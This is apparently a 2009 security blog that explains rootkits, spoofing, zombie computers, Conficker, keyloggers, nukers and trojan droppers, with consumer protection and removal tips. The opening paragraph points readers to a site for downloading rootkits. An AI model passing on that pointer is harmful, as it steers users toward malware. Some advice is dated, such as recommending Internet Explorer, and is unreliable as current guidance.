Most antiviruses are not capable of finding the rootkits. Even some of the antiviruses found certain types of rootkits, they cannot find all types of the Rookits. Fortunatley softwares for finding the Rootkits (like Rootkit Revealer) are available in the market for finding and deleting the Rootkits. Most of the Rootkits are installed in the target machine by the user in the form of patch or key generator. Lots of Rootkits are available in the internet for downloading. If you want one visit: http://vx.netlux.org/.

Monday, May 11, 2009

Make e-banking more secure...

We are familiar with the stories of several people who lost their money via e-banking. The banks are stepping up security as the cases of money loss through the e-banking increases. But in most case the money loss is due to the unawareness of the user rather than the security provided by the banks. Here are some tips that would helpful in increasing your security in e-banking:

* Do not use computers in internet cafe or computers in other institutions that you found less secure. It is always better to use your own personal computer for this purposes. The computers in internet cafe has less security as it contains lots of malware or spywares and viruses. It may steal your account details and sent this details to the hacker. These details will help the hacker to take money from your account easily. Some computers in the internet cafes are installed with anti virus softwares. But do not trust this as a high secure because in most internet cafes the anti virus softwares are not updated periodically. This softwares cannot prevent newly formed spywares.
* Use a good anti-virus software in your computer. It is more important that you must update the anti virus software periodically. This enables the software to detect more and more viruses and thus increase the security of your computer.
* Use a firewall other than windows firewall so that we can monitor the usage of internet by the programs in the computer and can block the programs that does not require internet connection.
* Always go to the website by typing the URL in the address field directly. Do not go to the website through the search engine, as it may lead to the spoofed website. The spoofed website may look similar to the original website so that the user believe that he has reached the original website. The user will enter the details in the spoofed website and his money will be utilized by the hacker. It is also important to check whether you have entered the correct address or not.
* Use a good browser like firefox or internet explorer for browsing.
* Do not save passwords in the browser. The saved password can be stealed by the hacker by understanding the algorithm of the browser.
* Also check whether the prefix of the URL in the address field is https instead of http.

Friday, May 8, 2009

Website Spoofing

Website spoofing is the practice of creating website as a hoax. The reader feel that the website was created by a different person or organization. In most cases the readers reach these sites by making small mistakes while entering the URL in the address bar. For example if the user enters www.virsu.com instead of www.virus.com, he may reach the spoofed site. (This is only an example and doesn't mean that www.virsu.com is a spoofed site.) URL redirection is a technique used for spoofing. URL redirection is generally used to redirect a user to a specific website. ie, to have more URLs for a specific website. These facility is illegally used for spoofing. Another method used is the usage of control characters. The control characters are non-printable characters that are represented by ASCII codes. The main motive in website spoofing is to publish false information regarding a person or authority or organisation.

Thursday, May 7, 2009

e-mail spoofing

e-mail spoofing is a technique used to sent the spam mails. In e-mail spoofing the sender address and the other parts of the e-mail header are modified in such a way that the recipient feels that the e-mail was from a different source. If the attacker requires response from the recipient, he adds his e-mail address to the reply to field. This is helpful in finding the attacker. But in some cases the attacker mounts false address in the place of the reply to field. In such cases the the reply of the recipient may badly affect the innocent third person.
There are softwares that generate random e-mail addresses for the attacker to use. If the recipient finds the origin of the email, it is rare that the e-mail is active. Some of the worms uses mass mailing. Here the worm infects a user. When the user opens the e-mail, it triggers the worm and the worm will start reading the address book of the user and then sends e-mail to the other users whose address is in the address book of the first user. If the gateway blocks this infected mail, a message showing that a virus has been blocked.

Wednesday, May 6, 2009

IP Address Spoofing

The protocol that is generally used to communicate between the systems is Internet Protocol (IP).
The data is sent through the internet in the form of packets. Each packet has a header which contains general information about the packet. The header of the packet in the IP contains the source address and the destination address. The source address is generally the IP address of the system from where the packet is sent over the internet and the destination address is the IP address of the system to which the data is sent. In IP address spoofing the source address in the header is replaced by a false address and is sent to the target system. The responce from the target system is sent to the false address. The attacker may be able to predict the responce from the target machine or he can direct the responce to his IP address.
The IP spoofing is usually done in Denial of Service (DoS) attack. Here the attacker doesn't need to know the responce of the target machine. He need just to sent the packets to the target with false address. Each packet to the target may be fixed with diferent false source address. So it is difficult to filter the unnecessary packets.
It is difficult for the attacker for attacking a system which requires authentication, but it is possible to attack the target to some extend. In some networks for example in the case of a network in the bank every system is interconnected and it may not require authentication to communicate between these systems. If the attacker wins in gaining access to one of the system in the bank, he can simply attack the whole network.
One of the method to prevent spoofing is to filter the incomming and the outgoing packets. The gateway to a network usually perfoms ingress filtering, which will prevent the data comming from the outside network with source address within the network. Similarly the gateway performs engress filtering which prevents the packets with source address outside the network. These measures prevents the spoofing only to some extend.

Tuesday, May 5, 2009

Cyber Spying


Cyber Spying is the practice of stealing data or information from a computer without the knowledge of the owner. The Cyber Spying targets competitors, government,enemies, economists, politicians etc. Cyber Spying may be done on a computer located at far away from the attacker. Cyber Spying can be done with the help of several malicious softwares including virus, trojan, spyware etc. The Cyber Spying is done at work place by a computer professional or at home by a trained professional hacker. Cyber Spying is done by infiltrating in to the computer network in the illegal way. There were strong laws to prevent Cyber Spying.

You will get a detailed information from :

http://www.rainbowskill.com/internet-fundas/all-about-chinese-cyber-spying.php

Sunday, May 3, 2009

A zombie computer

Many people knew that a hacker can use a computer connected to internet for his illegal purposes. Such computers which are connected to the internet that obeys a hacker via a virus or trojan is called a zombie computer. The computer became a zombie when a virus or trojan gets installed the computer. There may be several such computers working simultaneously for a particular hacker. This makes it difficult to trace the hacker. Since the owner of the computer is unaware of this, the computer is known as zombies.
Zombies are generally used for sending spam emails and for the spreading of the trojans or computer viruses. This help the spammers not only to save their bandwidth cost but also to remain undetected. Certain hackers use zombies to commit click fraud against the sites displaying the pay per click advertisement. The hackers use the zombies for the Denial of Service (DoS) attack. Here the hacker sends unnecessary packets to the targeted website so that the legal users cannot access the website. The intense flooding can be easily found out and prevented, but the pulsating flooding remain unidentified for several months or years. The DoS attack is even done against the top sites like yahoo,ebay etc.
Network Intrusion-prevention systems (NIPS) are usually useful for preventing, detecting and blocking zombie computers.Computer users frequently perform backups and delete suspicious mail messages as preventive measures against infection.

Thursday, April 30, 2009

Conflicker : Want to know more ?

Most of the computer users were afraid of Conflicker worm. Conflicker is a worm that affects the computers running on windows. Conflicker exploits the vulnerabilities of windows that became the headache of many computer users. The name conflicker is derived from the words 'configure' and the German word 'ficker' which means fucker. Conflicker was discovered in November 2008. It propagates through the internet and exploits the vulnerability of network services in windows (windows 2000,windows server 2003, windows XP, windows vista and windows server 2008. Microsoft has released the patch to counter the conflicker. Conflicker has 5 varients: A,B,C,D and E.

Symptoms of infection
In 13 February 2009, Microsoft is offering a $USD250,000 reward for information leading to the arrest and conviction of the individuals behind the creation and/or distribution of Conficker worm.

Wednesday, April 29, 2009

Protect your PC from conflicker

There are several ways to protect the PC from conflicker. Since it affects PC's running on Windows, most PC users are troubled with it. The methods of protecting the PC from conflicker is the common procedure for the removal of virus.
  • Use a good and updated anti-virus software that is capable of detecting and healing the infected areas.
  • Download latest patch from the Microsoft's website.
Link is - http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
  • Turn on the firewall.
  • If a outbreak of conflicker (or any other virus) in future is predicted, save a backup copy of all the data in your system to an external storage device like CD or DVD.

Monday, April 20, 2009

DeepFreeze: Substitute for antivirus software

Most people install anti-virus and does not update it. This will give chance to the new viruses to escape from the virus scan done by the anti-virus software. Some anti-viruses even updated may do not have the virus signatures so the presence of certain viruses will not be discovered. A software by Faronics Corporation removes the difficulty for updating the anti-virus software. DeepFreeze is not an anti-virus software. But it will prevent the attack of the viruses very efficiently.



The DeepFreeze allows the user to freeze the drive he wants including the drive in which the operating system is installed. After freezing the drive we cannot save or make changes in data or files in the freezed drive. We can save a file in the freezed drive. But during the system restart the file will be lost. While saving a file in the freezed drive, no warning will be displayed about the loss of data during the next restart. So the usage of DeepFreeze must be done in a careful manner.
We can save a file or install a software permanantly in the freezed drive only after making the DeepFreeze in Thawed mode. For making the DeepFreeze in the Thawed mode press shift and click on the icon of the DeepFreeze in the system tray. A window will appear on the screen. The set a password and then you can chabge the DeepFreeze to Thawed mode in a few mouse clicks.

Friday, April 17, 2009

Google News Alert Virus

Almost all the internet users trust Google for their services. Now the hackers are exploiting this trust. People who want to be in touch with the latest events they activate the Google News Alert. But recently a new virus emerged by the name Google News Alert.
The virus is sent to the victim in the as email same as that of the Google news alert. When the victim opens the mail there will be an article with a link. If the victim clicks on the link, he will be taken to a website. Then a pop-up will come informing that your system is infected with a virus. For removing the virus you have to download some anti viral softwares. The pop-up contains provision for downloading the anti-viral software. If the user allows the computer to download the anti-viral software will result in the installation of the computer virus in the victim's system.
Due to the increasing number of cyber attack it is hard to keep the computer away from the viruses. However taking prevention will reduce the number of attacks to a great extend. So be careful in using the internet. You will get a detailed idea of the above post from:

Virus attack on DPS Computer System

One of the computer systems of the Texas Department of Public Safety was infected by a virus. The virus affected internal communication systems and also some of the external communication system. The external service that got affected includes the issuance of the Texas drivers' licenses. Fortunately the database on which Texas police agencies depend for checking for identities, warrants and criminal records is unaffected by the virus. The authorities reported that about 80 percent of the offices have had the computer service restored.

Monday, March 2, 2009

Facebook under attack of two malware applications

Two malware applications are suspected to have hit Facebook in the duration of a week, possibly reading thousands of personal details. The latest application is said to be posting notifications on user's profile that say, "[Name on friend list] has just reported you to Facebook for violating our terms of service - this is your official warning. Click here to find out why you were reported." This statement will surely make the victim to click on the link. The link in the notification leads to an application named "Facebook - closing down" which, once installed, will send the same message to every one of the users' friends The first application hit users over the weekend, sending out notifications to users that one of their friends had "faced some errors" when checking their profile. Users were prompted to click a link to view the error message.Facebook applications need to ask the users' permission before they can access the personal information on their profile, but the rogue application redesigned the permission-requesting page so users did not know what they were clicking on. The application then suggested that users check their friends profiles for errors, helping the application to spread.

Tuesday, February 24, 2009

Keylogger Trojan

Keylogger Trojan is a malicious program that steals your user name and password and logging them to a file and send to the attackers. Some keyloggers are available in the market for buying. They are generally used by the parents to track the online activities of their children and also by the people who want to track the contacts and online activities of their life partner. Some keyloggers are capable of monitering your web browser. If a desired responce is found it tracks the required information and sent to the remote attacker. The desired responce may be the opening of a site of the bank in which you may have a account. Some sites requires pointing by mouse rather than the keystrokes. This reduces some of the attack. But some trojans send the screenshot of the victims application to the remote attacker.
The keyloggers are installed in the victim's machine by making him belive that they are useful software. The most of the infection are through the P to P network.
To avoid the infection connect only to trusted network. Download softwares only from trusted sources. Use an updated Antivirus software and install a firewall.

Friday, February 20, 2009

Nuker

Nuker is a trojan that allows attacker to reboot, shut down or even crash the victim's computer which is connected to the internet. In most cases the nuker requires only the IP address of the target computer. When the attacker enters the IP address of the victim, the nuker sends some packets that made the victim's computer to restart, shut down or even to crash.

Removal of Nuker

The removal of Nuker is not so difficult. Most of the anti viruses available in the market is able to delete the Nukers. It can also be deleted manually. For manually disinfecting the nuker, we have to approach in different methods for different Operating Systems. The best way is to delete the malware manually and to reboot the computer. In Windows 9x and millenium Operating Systems just go to the command prompt and delete the file using the command DEL. eg. if the file name is nuke.exe in the windows folder, then just type:
DEL C:\WINDOWS\NUKE.EXE
and press ENTER key. Then reboot the system.
The manual disinfection is a risky process. So it is adviced for the users who have thorough knowledge about the operating system.

In the case of Windows NT, 2000, XP the first thing to be done is to rename (including its extension) the nuker and then restart the computer and then delete the file manually.

The manual disinfection is a risky process. So it is adviced for the users who have thorough knowledge about the operating system.

Note that you have to disable the system restore before manual disinfection. While renaming the file the Operating System will copy the original files to another folder for back up. This may result in the disinfection failure. So system restore must be disabled.

Disable or enable Windows Me System Restore

Disable or enable Windows XP System Restore

Thursday, February 19, 2009

Trojan. Dropper



Trojan. Droppers are trojans that instals in a system without the informing the user about their presence. Usually virus writers and hackers create trojan droppers to install other applications or placing the backdoor applications. It was discovered in february 2000. It is also known as virus.dropper. It affects Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP. However the threat level is low and can be easily removed.


However prevention will reduce the risk of infection. Some of the preventive measures are given below:




  • Use a firewall to block all the applications that are trying to connect the internet without your permission. This will reduce the risk even after the infection.


  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.


  • Isolate the infected computers quickly to prevent the trojan from spreading further. Perform a forensic analysis and restore the computers using trusted anti-trojan software.


  • Enforce a password policy. Complex passwords make it difficult to crack password files on infected computers. This helps to prevent or limit damage when a computer is infected.


  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.


  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available. I have put a post on disabling the autoplay in XP and vista earlier.


  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.


  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.


  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied. Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.


  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.


  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.


  • It is recommended to disable the system restore. You will get more information about enabling and diabling the system restore XP and other OS.


Disable or enable Windows Me System Restore



Disable or enable Windows XP System Restore